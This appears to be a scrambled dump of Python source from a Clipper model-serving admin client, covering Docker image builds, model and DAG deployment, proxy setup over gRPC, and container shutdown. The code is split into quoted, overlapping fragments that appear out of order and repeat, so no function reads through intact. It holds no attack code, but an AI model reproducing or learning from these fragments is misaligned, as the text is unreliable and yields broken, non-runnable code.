message", "Seek back to beginning of file for reading context_file.seek(0) image", "start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while True:", "/model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END)", "= 1 for model_info in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name,", "raise ClipperException( \"Invalid value: {version}: a model version must be", "is a list of model Raises ------ :py:exc:`clipper.UnconnectedException` versions. All", "labels): if not self.connected: raise UnconnectedException() def build_and_deploy_model(self, name, version,", "[] backup_info = [] count = 1 for model_info in", "deployment_regex.match(name) is None: raise ClipperException( \"Invalid value: {name}: a model", "backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id,", "metrics for this instance. On error, the string will be", "clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any containers serving versions 1 and 2", "import pprint import time import re import os import tarfile", "entry in the dict, the key is a model name", "[] proxy_info = [] backup_info = [] count = 1", "of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names :", "end with \" \"an alphanumeric character (e.g. 'example.com', regex used", "info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s", "backup_info = [] count = 1 for model_info in nodes_list:", "for these models and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names):", "dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info", "backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(tup[-1], \"22223\", expanded_dag))", "\"music_recommender\" and version 3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will", "container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model info to proxy')", "self.register_model( # name, # version, # input_type, # image=image, #", "model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict) # pp = pprint.PrettyPrinter(indent=4) #", "be stopped. \"\"\" # if not self.connected: # raise UnconnectedException()", ", self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime DAG to admin", "################################# self.logger = ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier }) def start_clipper(self,", "Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig(", "info to model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s", "current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any containers serving versions 1", "# ('management frontend', mgmt_frontend_url)]: # r = requests.get(url, timeout=5) #", "method can be used to clean up leftover Clipper model", "If you started Redis independently, this will not affect Redis.", "format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger =", "It can also be called without calling ``connect`` first. \"\"\"", "# if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(backup_info[-1][2], \"22222\",", "ClipperException, UnconnectedException from .version import __version__, __registry__ from . import", "get_query_addr(self): \"\"\"Get the IP address at which the query frontend", "the value is a list of model Raises ------ :py:exc:`clipper.UnconnectedException`", "be an error message (not JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException`", "= StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))", "def stop_all_model_containers(self): \"\"\"Stops all model containers started via Clipper admin", "host = self.cm.add_replica(model_name, model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s with", "\"Invalid value: {version}: a model version must be a valid", "= name+version+str(1) ## Starting frontend frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id,", "list(str)) For each entry in the dict, the key is", "expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info, frontend_info) self.runtime_dag", "self.logger.info('[DEPLOYMENT][Backup] Finished setting model info to proxy') count += 1", "= management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s", "is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any containers serving", "list will be stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas", "import json import pprint import time import re import os", "connected to Clipper cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name,", "str The address as an IP address or hostname. Raises", "#self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(proxy_ip, \"22223\",", "at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version, dag_description, labels): if", "False ################################# self.logger = ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier }) def", "proxy_info: proxy_name = tup[0] proxy_id = tup[1] proxy_ip = tup[2]", "def stop_inactive_model_versions(self, model_names): \"\"\"Stops all model containers serving stale versions", "Parameters ---------- model_versions_dict : dict(str, list(str)) For each entry in", "Starting frontend frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048)", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting", "context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode(", "This parameter will take not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful)", "for line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image def deploy_model(self,", "= self.get_all_models(verbose=True) # model_dict = {} # for m in", "to explicitly list all versions of a model when calling", "version=version) if container_registry is not None: image = \"{reg}/{image}\".format( reg=container_registry,", "failed\".format(name=name, url=url)) # break # except RequestException as e: #", "model specified in the list will be stopped. Raises ------", "be stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each", "expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells", "model_versions_dict : dict(str, list(str)) For each entry in the dict,", "#############TEST################ self.runtime_dag = \"\" self.lock = False ################################# self.logger =", "version, dag_description, labels): if not self.connected: raise UnconnectedException() def build_and_deploy_model(self,", "{}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version, dag_description, labels): if not", "dag description with the model/proxy instances info expanded_dag = graph_parser.expand_dag(dag_description_,", "all containers for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def", "version) self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas) # self.register_model( #", "also be called without calling ``connect`` first. If graceful=False, Clipper", "/model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END)", "will be stopped. \"\"\" # if not self.connected: # raise", "name, version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added new runtime", "= True except ClipperException as e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg))", "prediction_pb2_grpc from .rpc import prediction_pb2 from .rpc import management_pb2 from", "image=image, num_replicas=num_replicas) # self.register_model( # name, # version, # input_type,", "version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image,", "not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper", "error, the string will be an error message (not JSON", "will not affect Redis. It can also be called without", "self.logger = ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format(", "# pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all model containers started via", "def __init__(self, container_manager): self.connected = False self.cm = container_manager #############TEST################", "model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s with container %s:%s (HOST:%s)\"%(model_name,", "\"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy info to", "specified models. For example, if you have deployed versions 1,", "df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image,", "r = requests.get(url, timeout=5) # if r.status_code != requests.codes.ok: #", "from google.protobuf.json_format import MessageToDict if sys.version_info < (3, 0): try:", "raise ClipperException( \"Invalid value: {name}: a model name must be", "Clipper will issue Docker Kill if it's in the Docker", "True import grpc from .rpc import model_pb2_grpc from .rpc import", "version must be a valid DNS-1123 \" \" subdomain. It", "\"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy info to model') #", "from .exceptions import ClipperException, UnconnectedException from .version import __version__, __registry__", "from .version import __version__, __registry__ from . import graph_parser DEFAULT_LABEL", "UnconnectedException() # model_info = self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_))", "starting Clipper: {}\".format(e.msg)) raise e def connect(self): \"\"\"Connect to a", "[frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand the", "effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper cluster", "import StringIO except ImportError: from StringIO import StringIO PY3 =", "stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\",", "1 for model_info in nodes_list: model_name,model_version,model_image = graph_parser.get_name_version(model_info) container_name, container_id,", "proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag))", "the Docker Mode. This parameter will take not effect in", "modelinfo)) return def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if not", "import graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR =", "deployed versions of models if you specify them. You almost", "__version__, __registry__ from . import graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES", "Docker image with model data from {}\".format( model_data_path)) image_result, build_logs", "running\") self.connected = True except ClipperException as e: self.logger.warning(\"Error starting", "df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents = StringIO( \"FROM", "Clipper management frontend or Redis has crashed. It can also", "'stream' in b and b['stream'] != '\\n': #log build steps", "None: raise ClipperException( \"Invalid value: {version}: a model version must", "is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is None: raise ClipperException( \"Invalid", "request predictions. Returns ------- str The address as an IP", "can be used to clean up leftover Clipper model containers", "the backups runtime dag info for tup in backup_info: if", "= pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all containers for these", "character (e.g. 'example.com', regex used for \" \"validation is '{reg}'\".format(", "= docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b in build_logs: if", "list(str) A list of model names. All replicas of all", "data from {}\".format( model_data_path)) image_result, build_logs = docker_client.images.build( fileobj=context_file, custom_context=True,", "admin commands. This includes the query and management frontend Docker", "the other stop_* methods. Use with caution. \"\"\" # if", "as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO(", "docker import tempfile import requests from requests.exceptions import RequestException import", "version, container_info, proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag # TODO:", "model will be stopped. \"\"\" if not self.connected: raise UnconnectedException()", "convenience method to avoid the need to explicitly list all", "will take not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped", "\"\"\"Get the IP address at which the query frontend can", "container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host = self.cm.add_replica(model_name,", "tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) # From", "model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s with container %s:%s (HOST:%s)\"%(model_name,", "for each version of each model will be stopped. Note", "self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version, input_type, image,", "\"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1]))", "versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all model containers", "#expand the dag description with the model/proxy instances info expanded_dag", "= graph_parser.get_name_version(model_info) container_name, container_id, host = self.cm.add_replica(model_name, model_version, \"22222\", model_image,", "affect Redis. It can also be called without calling ``connect``", "from io import BytesIO as StringIO PY3 = True import", "Finished setting proxy info to model') runtime_dag_id = name+version+str(1) ##", "3 untouched. Parameters ---------- model_names : list(str) The names of", "Redis. It can also be called without calling ``connect`` first.", "from the running Clipper cluster. Returns ------- str The JSON", "model containers started via Clipper admin commands. This method can", "e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise e def connect(self): \"\"\"Connect", "------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version of each", "raise UnconnectedException() # model_info = self.get_all_models(verbose=True) # model_dict = {}", "containers. If you started Redis independently, this will not affect", ":py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the IP address at", "# if r.status_code != requests.codes.ok: # raise RequestException( # \"{name}", "fileobj=context_file, mode=\"w\") as context_tar: context_tar.add(model_data_path) # From https://stackoverflow.com/a/740854/814642 try: df_contents", "tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) except", "self.connected = False self.cm = container_manager #############TEST################ self.runtime_dag = \"\"", "if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(backup_info[-1][-1], \"22223\",", "setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime", "version=version)) def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name,", "= dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): # dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_)", "import time import re import os import tarfile import sys", "tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished", "cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while True: # try: # query_frontend_url", "be stopped. Note ---- This method will stop the currently", "management frontend or Redis has crashed. It can also be", "with \" \"an alphanumeric character (e.g. 'example.com', regex used for", "Not Windows Compatible logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) #", "for \" \"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object): def", "\"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished setting model", "Tarfile context manager to finish the tar file # Seek", "graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info, frontend_info) self.runtime_dag = expanded_dag", "be used to clean up leftover Clipper model containers even", "}) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) #", "_validate_versioned_model_name(name, version): if deployment_regex.match(name) is None: raise ClipperException( \"Invalid value:", "b and b['stream'] != '\\n': #log build steps only self.logger.info(b['stream'].rstrip())", "finish the tar file # Seek back to beginning of", "frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip =", "model_names: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else:", "of the instances proxy_ip = self.cm.get_container_ip(host, proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id,", "Finished setting model info to proxy') count += 1 #", "{ 'cluster_name': self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES):", "np from google.protobuf.json_format import MessageToDict if sys.version_info < (3, 0):", "# \"Stopped all containers for these models and versions:\\n{}\".format( #", "backup_name, backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name,", "deploying model {name}:{version}.\".format( name=name, version=version)) def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip,", "outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s \"%(\"localhost\",\"33333\", modelinfo)) return", "containers for these models and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self,", "daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime dag info for tup in", "specified in the list will be stopped. Raises ------ :py:exc:`clipper.UnconnectedException`", "Use with caution. \"\"\" # if not self.connected: # raise", "= 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used Internally for Test;", "JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get", "'{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager): self.connected =", "models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all model", "proxy_id = tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s", "\"\"\"Stops all model containers started via Clipper admin commands. This", "deploy_model(self, name, version, input_type, image, labels=None, num_replicas=1, batch_size=-1): if not", "%s %s %s %s %s\"%('1', name, version, 'old' , self.cm.admin_ip,", "sys from cloudpickle import CloudPickler import pickle import numpy as", "backup_id) backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host,", "calling ``connect`` first. If graceful=False, Clipper will issue Docker Kill", "import pickle import numpy as np from google.protobuf.json_format import MessageToDict", "model/proxy instances info expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info,", "to stop. Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\" # if not self.connected:", "m[\"model_name\"] in model_names: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"])", "name+version+str(1) ## Starting frontend frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2],", "to a running Clipper cluster.\"\"\" self.cm.connect() self.connected = True self.logger.info(", "RequestException import json import pprint import time import re import", "## get the ip of the instances proxy_ip = self.cm.get_container_ip(host,", "line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image def deploy_model(self, name,", "url in [('query frontend', query_frontend_url), # ('management frontend', mgmt_frontend_url)]: #", "input_type=input_type, image=image, num_replicas=num_replicas) # self.register_model( # name, # version, #", "model containers even if the Clipper management frontend or Redis", "includes the query and management frontend Docker containers and all", "backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name,", "grpc from .rpc import model_pb2_grpc from .rpc import model_pb2 from", "as np from google.protobuf.json_format import MessageToDict if sys.version_info < (3,", "the Clipper management frontend or Redis has crashed. It can", "\"\"\"Connect to a running Clipper cluster.\"\"\" self.cm.connect() self.connected = True", "= \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if deployment_regex.match(name)", "# version, # input_type, # image=image, # labels=labels, # batch_size=batch_size)", "class ClipperConnection(object): def __init__(self, container_manager): self.connected = False self.cm =", "UnconnectedException() image = self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name,", "[] count = 1 for model_info in nodes_list: model_name,model_version,model_image =", "b['stream'] != '\\n': #log build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model", "frontend frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip", "m in model_info: # if m[\"model_name\"] in model_names and not", "only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image to {}\".format(image)) for line", "value is a list of model Raises ------ :py:exc:`clipper.UnconnectedException` versions.", "logging.basicConfig( format='%(asctime)s %(levelname)-8s %(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( # format='%(asctime)s", "backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id)", "CloudPickler import pickle import numpy as np from google.protobuf.json_format import", "run_as_lst = 'RUN apt-get -y install build-essential && pip install'.split(", ".rpc import prediction_pb2_grpc from .rpc import prediction_pb2 from .rpc import", "# raise RequestException( # \"{name} end point {url} health check", "None: image = \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client = docker.from_env() self.logger.info(", "count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(container_ip,", "Exit Tarfile context manager to finish the tar file #", "backup_id, backup_host = self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s", "logging import docker import tempfile import requests from requests.exceptions import", "%s %s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\"", "= tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT]", "\"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info = [frontend_name, frontend_container_id,", "which the query frontend can be reached request predictions. Returns", "management_pb2_grpc from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException,", "raise UnconnectedException() return self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops all versions", "frontend_info = [frontend_name, frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\")", "StringIO except ImportError: from StringIO import StringIO PY3 = False", "string containing the current set of metrics for this instance.", "info to proxy') count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s", "containers serving version 3 untouched. Parameters ---------- model_names : list(str)", "the specified models. This is a convenience method to avoid", "in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]]", "self.cm.add_replica(model_name, model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started %s with container %s:%s", "%s %s %s\"%(proxy_ip, \"22223\", container_name, count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT]", "# else: # model_dict[m[\"model_name\"]] = [m[\"model_version\"]] # self.cm.stop_models(model_dict) # pp", "if not self.connected: raise UnconnectedException() version = str(version) _validate_versioned_model_name(name, version)", "self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\", max_workers=2048) frontend_ip = self.cm.get_container_ip(\"localhost\", frontend_container_id) frontend_info", "%s %s\"%('1', name, version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag)) self.logger.info(\"Added", "expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1])) return", "connect(self): \"\"\"Connect to a running Clipper cluster.\"\"\" self.cm.connect() self.connected =", "# self.cm.stop_models(model_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s \"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self,", "#log build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing model Docker image to", "import prediction_pb2_grpc from .rpc import prediction_pb2 from .rpc import management_pb2", "pkgs_to_install) self.deploy_model(name, version, input_type, image, labels, num_replicas, batch_size) def build_model(self,", "__registry__ from . import graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES =", "\"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name))", "ImportError: from StringIO import StringIO PY3 = False else: from", "[('query frontend', query_frontend_url), # ('management frontend', mgmt_frontend_url)]: # r =", "the currently deployed versions of models if you specify them.", "backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip,", "# image=image, # labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format(", "(3, 0): try: from cStringIO import StringIO except ImportError: from", "container_info = [] proxy_info = [] backup_info = [] count", ":py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names : list(str) A list of model", "container_name, container_ip, host) ## get the ip of the instances", "backup_info[-1][0], count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished setting model info", "PY3 = False else: from io import BytesIO as StringIO", "\"\"\" # if not self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict)", "model will be stopped. Note ---- This method will stop", "------- str The address as an IP address or hostname.", "version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"]) will stop any containers serving versions 1 and", "versions 1 and 2 but will leave containers serving version", "20) #self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s", "stop. Raises ------ :py:exc:`clipper.UnconnectedException` \"\"\" # if not self.connected: #", "\"\"\" if not self.connected: raise UnconnectedException() return self.cm.get_query_addr() def stop_models(self,", "tup in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(tup[-1],", "def inspect_instance(self): \"\"\"Fetches performance metrics from the running Clipper cluster.", "None: raise ClipperException( \"Invalid value: {name}: a model name must", "For example, if you have deployed versions 1, 2, and", "%s with container %s:%s (HOST:%s)\"%(model_name, backup_name, backup_id, backup_host)) backup_ip =", "name, version, dag_description=None, runtime=\"\"): if not self.connected: raise UnconnectedException() #", "containers serving stale versions of the specified models. For example,", "will issue Docker Kill if it's in the Docker Mode.", "to {}\".format(image)) for line in docker_client.images.push(repository=image, stream=True): self.logger.debug(line) return image", "context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context manager to finish the", "if m[\"model_name\"] in model_names and not m[\"is_current_version\"]: # if m[\"model_name\"]", "not self.connected: raise UnconnectedException() image = self.build_model(name, version, model_data_path, base_image,", "# while True: # try: # query_frontend_url = \"http://{host}/metrics\".format( #", "list(str) The names of the models whose old containers you", "runtime dag info for tup in proxy_info: proxy_name = tup[0]", "backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3, 20)", "'example.com', regex used for \" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if", "{container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo = tarfile.TarInfo('Dockerfile')", "requests from requests.exceptions import RequestException import json import pprint import", "build_and_deploy_model(self, name, version, input_type, model_data_path, base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1,", "versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all model containers started", "start and end with \" \"an alphanumeric character (e.g. 'example.com',", "num_replicas=1, batch_size=-1): if not self.connected: raise UnconnectedException() version = str(version)", "to beginning of file for reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format(", "name must be a valid DNS-1123 \" \" subdomain. It", "can be reached request predictions. Returns ------- str The address", "has crashed. It can also be called without calling ``connect``", "must consist of lower case \" \"alphanumeric characters, '-' or", "processes that were started via Clipper admin commands. This includes", "%s 